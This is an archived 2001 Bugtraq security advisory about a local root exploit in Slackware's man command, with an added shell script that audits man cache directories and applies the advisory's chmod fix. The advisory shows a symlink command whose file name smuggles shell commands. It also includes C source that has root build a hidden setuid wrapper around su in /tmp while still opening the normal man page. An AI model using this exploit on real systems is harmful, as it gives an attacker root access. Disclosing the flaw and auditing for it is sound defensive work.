6759588 2001-07-17 08:34 -0500 /75 lines/ <josh@pulltheplug.com>
Sent by: joel@lysator.liu.se
Imported: 2001-07-17 18:52 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <18037>
Subject: Slackware /usr/bin/man vulnerability
------------------------------------------------------------
From: <josh@pulltheplug.com>
To: <bugtraq@securityfocus.com>
Message-ID: <Pine.LNX.4.33.0107170825320.25427-100000@shell.pulltheplug.com>

The following advisory was sent to Slackware July 11th, 2001; they failed to respond, so I hope the temporary patch will make do:

Submitted by   : Josh (josh@pulltheplug.com), lockdown (lockdown@lockeddown.net), zen-parse (zen-parse@gmx.net)
Vulnerability  : /usr/bin/man
Tested On      : Slackware 8.0 and before.
Local          : Yes
Remote         : No
Temporary Fix  : chmod 700 /var/man/cat*
Target         : root or any other user that uses man
Greets to      : alpha, fr3n3tic, omega, eazyass, remmy, RedPen, banned-it, slider, cryptix, s0ttle, xphantom, qtip, Sultrix, Defiance, Insane, rusko, falcon-networks.com.
See also       : http://www.securityfocus.com/vdb/?id=2815

Slackware 8.0 and previous issues of Slackware are released with /var/man/cat*/ chmod 1777:

    drwxrwxrwt    2 root     root         4096 Jul 11 11:03 cat*/

Since these directories are world writeable, we can create symlinks there like so:

    ln -s "/usr/man/man7/man.7.gz;cd;cd ..;cd ..;cd ..;cd ..;cd tmp;export PATH=. ;script;man.7" /var/man/cat7/man.7.gz

When `/usr/bin/man man` is executed by root, it will create /var/man/cat7/man.1.gz. The symlink forces it to create a file in /usr/man/man7 named:

    "/usr/man/man7/man.7.gz;cd;cd ..;cd ..;cd ..;cd ..;cd tmp;exportPATH=.; script;man.7.gz."

/usr/bin/man will then execute /tmp/script which contains:

    #include <stdio.h>
    #include <stdlib.h>     /* system() */
    #include <unistd.h>
    #include <sys/types.h>
    #include <sys/stat.h>
    #include <sys/wait.h>
    #include <errno.h>

    int main() {
        FILE *fil;
        mode_t perm = 06711;

        if (!getuid()) {
            /* Running as root: write, compile and mark setuid a small wrapper. */
            fil = fopen("/tmp/bleh.c", "w");
            fprintf(fil, "%s\n", "#include <unistd.h>");
            fprintf(fil, "%s\n", "#include <stdio.h>");
            fprintf(fil, "%s\n", "int main() {");
            fprintf(fil, "%s\n", "setreuid(0,0);setregid(0,0);");
            fprintf(fil, "%s\n", "execl(\"/bin/su\",\"su\",NULL);");
            fprintf(fil, "%s\n", "return 0; }");
            fclose(fil);
            system("/usr/bin/gcc -o /tmp/bleh /tmp/bleh.c");
            unlink("/tmp/bleh.c");
            chmod("/tmp/bleh", perm);
        }
        /* Hand off to the real man page so the invoking user sees nothing odd. */
        execl("/usr/bin/man", "man", "/usr/man/man7/man.7.gz", NULL);
        return 0;
    }

With the above code compiled in /tmp/script, if root were to run `man man`, a suid shell would be left in /tmp/bleh.

(6759588) / <josh@pulltheplug.com>/-------(Wrapped)
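The following is an added audit script, not part of the original advisory: it checks a man cache root (the advisory's /var/man, passed as a parameter so it can run against a constructed tree) for the two preconditions the post relies on, world-writable cat* directories and symlinks planted inside them, and can apply the advisory's temporary fix of chmod 700.

```shell
#!/bin/sh
# Added example (not from the original post). Audits the cat* cache
# directories below a man root such as /var/man. The root is an argument
# so the functions can be exercised on a constructed directory tree.

# Print each cat* directory under $1 whose mode grants write to "others".
world_writable_cat_dirs() {
    root=$1
    for d in "$root"/cat*; do
        [ -d "$d" ] || continue
        # In "ls -ld" output, character 9 is the write bit for "others".
        case "$(ls -ld "$d" | cut -c9)" in
            w) echo "$d" ;;
        esac
    done
}

# Print each symlink sitting directly inside the cat* directories under $1.
# Formatted-page caches should only ever hold regular files.
planted_symlinks() {
    root=$1
    find "$root"/cat* -maxdepth 1 -type l 2>/dev/null
}

# Apply the advisory's temporary fix (chmod 700) to every cat* directory.
lock_down_cat_dirs() {
    root=$1
    for d in "$root"/cat*; do
        [ -d "$d" ] && chmod 700 "$d"
    done
    return 0
}

# Report findings for $1. Returns 0 when clean, 1 when anything was found.
audit_man_cache() {
    dirs=$(world_writable_cat_dirs "$1")
    links=$(planted_symlinks "$1")
    [ -n "$dirs" ] && printf 'world-writable cat dirs:\n%s\n' "$dirs"
    [ -n "$links" ] && printf 'symlinks inside cat dirs:\n%s\n' "$links"
    [ -z "$dirs$links" ]
}
```

Run `audit_man_cache /var/man` on a Slackware host to reproduce the advisory's finding, then `lock_down_cat_dirs /var/man` to apply its workaround.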